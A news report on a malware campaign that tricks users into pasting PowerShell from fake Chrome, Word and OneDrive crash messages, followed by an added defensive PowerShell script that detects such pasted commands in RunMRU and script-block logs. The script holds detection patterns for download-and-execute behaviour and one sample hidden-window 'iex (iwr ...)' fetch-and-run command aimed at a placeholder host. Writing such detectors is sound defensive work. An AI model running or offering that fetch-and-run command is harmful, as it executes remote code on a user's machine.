A new malware distribution campaign has been discovered that uses fake crash messages from Google Chrome, Word, and OneDrive to trick users into installing “fixes” that are actually malware.
The lure reads something like: “Chrome is running slowly. Speed it up by installing this program.” One click on “OK” and the chain starts.
The technique has been found in use by several hacker groups, including the group behind ClearFake, a new group called ClickFix, and the infamous TA571, which is known as an avid spreader of malware.
The fake messages prompt the user to press a button that copies a malicious PowerShell script to the clipboard, then instruct them to paste it into the Run dialog or a PowerShell window and execute it. Once run, that script installs the malware on the device.
A malicious PowerShell script is a set of PowerShell commands written to carry out harmful actions on a computer or network. Such scripts can do many things, from stealing credentials to installing malware that gives an attacker remote control of the system.
When executed, the script proceeds in several stages. It first checks that the device is the intended target. It then carries out actions such as flushing the DNS cache, clearing the clipboard, displaying further fraudulent messages, and downloading additional PowerShell scripts and payloads from remote servers.
You can protect yourself by:
1. Being careful when opening email attachments or clicking links from untrusted sources.
2. Keeping your operating system updated to the latest version and installing antivirus software.
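As an added defensive example (not code from the article or from any of the groups it names), the PowerShell below scores a command line against the behaviours the article describes for this lure (DNS cache flush, clipboard wipe, remote script download, decoy message) together with the hidden-window launch switches such commands typically carry, and then applies the same scoring to two places where a pasted command leaves traces on a Windows host: the Win+R history under the RunMRU registry key and PowerShell script-block logging (event ID 4104, which only exists if script-block logging is enabled by policy). The indicator names, the two-hit threshold and the sample commands are constructed for this example; the registry path and event ID are standard Windows locations.

```powershell
# Added example: triage helper for "paste this into Run" lures. Not the article's code.
# Assumptions: RunMRU path and event 4104 are the standard Windows locations;
# indicator names, threshold and sample commands below are constructed.

$PasteRunIndicators = @(
    @{ Name = 'DnsCacheFlush';   Pattern = 'Clear-DnsClientCache|ipconfig(\.exe)?\s*/flushdns' }
    @{ Name = 'ClipboardWipe';   Pattern = 'Set-Clipboard|Clipboard\]::Clear' }
    @{ Name = 'RemoteDownload';  Pattern = 'Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|DownloadFile' }
    @{ Name = 'InlineExecution'; Pattern = 'Invoke-Expression|\biex\b' }
    @{ Name = 'HiddenLaunch';    Pattern = '-w(indowstyle)?\s+hidden|-nop(rofile)?\b|-e(xecution)?p(olicy)?\s+bypass|-enc(odedcommand)?\b' }
    @{ Name = 'DecoyMessage';    Pattern = 'MessageBox\]::Show|PresentationFramework' }
)

function Get-PasteRunScore {
    # Returns one record per command: which indicators matched and whether the
    # combination looks like the lure. -match is case-insensitive by default.
    param(
        [Parameter(Mandatory)][string]$Command,
        [string]$Source = 'manual'
    )
    $hits = foreach ($i in $PasteRunIndicators) {
        if ($Command -match $i.Pattern) { $i.Name }
    }
    # A single hit is usually ordinary admin work (e.g. a manual DNS flush);
    # two or more together (hidden launch + download + execute) is the lure's shape.
    [pscustomobject]@{
        Source     = $Source
        Score      = @($hits).Count
        Suspicious = (@($hits).Count -ge 2)
        Indicators = (@($hits) -join ',')
        Command    = $Command
    }
}

function Get-RunMruCommands {
    # Win+R keeps recent commands as single-letter values under RunMRU;
    # each value ends with a literal "\1" that is stripped here.
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    if (-not (Test-Path $key)) { return }
    $props = Get-ItemProperty -Path $key
    foreach ($name in ($props.PSObject.Properties.Name | Where-Object { $_ -match '^[a-z]$' })) {
        ($props.$name -replace '\\1$', '')
    }
}

function Get-ScriptBlockCommands {
    # Script-block logging records the text of every executed block as event 4104;
    # Properties[2] holds the ScriptBlockText field.
    param([int]$MaxEvents = 200)
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object { $_.Properties[2].Value }
}

# Constructed samples: a benign admin command (score 1, not suspicious) and a
# command with the lure's shape pointing at a reserved test domain (score 3, suspicious).
$samples = @(
    'ipconfig /flushdns',
    'powershell -w hidden -nop -c "iex (iwr ''http://example.invalid/fix.ps1'')"'
)
$samples | ForEach-Object { Get-PasteRunScore -Command $_ -Source 'constructed' } | Format-Table -AutoSize

# Live triage on the current host. RunMRU needs no elevation; 4104 events exist
# only where script-block logging is enabled, so an empty result is not a clean bill.
Get-RunMruCommands      | ForEach-Object { Get-PasteRunScore -Command $_ -Source 'RunMRU' } |
    Where-Object Suspicious | Format-Table -AutoSize
Get-ScriptBlockCommands | ForEach-Object { Get-PasteRunScore -Command $_ -Source 'Event4104' } |
    Where-Object Suspicious | Format-Table -AutoSize
```

The RunMRU check is the quick one for a help desk: a user who was talked into pasting something into Win+R leaves the command there even after the lure page is closed. The 4104 check catches what the first-stage script went on to do (DNS flush, clipboard clear, further downloads), but only on hosts where script-block logging was turned on beforehand, so enabling it fleet-wide is the prerequisite for this second view.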
Origin: bleepingcomputer.com